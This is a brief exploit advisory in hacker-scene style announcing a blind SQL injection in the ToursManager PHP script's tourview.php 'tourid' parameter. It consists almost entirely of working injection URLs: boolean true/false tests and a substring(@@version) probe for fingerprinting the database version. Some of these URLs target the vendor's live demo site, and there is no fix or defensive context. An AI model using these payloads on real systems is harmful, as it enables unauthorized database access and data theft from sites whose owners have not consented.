[>] Name:--> ToursManager PhP Script <= Blind Sql Injection [>] Discovered by:--> XaDoS [>] ContacT m&:--> xados[at]hotmail.it [>] Site:--> http://www.toursmanager.com ######### [■] £XpLoIT: |: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true) |: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false) Version: |: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true) |: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false) V=> 5.x.x XD ######### [■] D&M0: |: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1-- |: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0-- |: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 ######### [■] Th4Nks T0: \> Boom3rang Langy Str0ke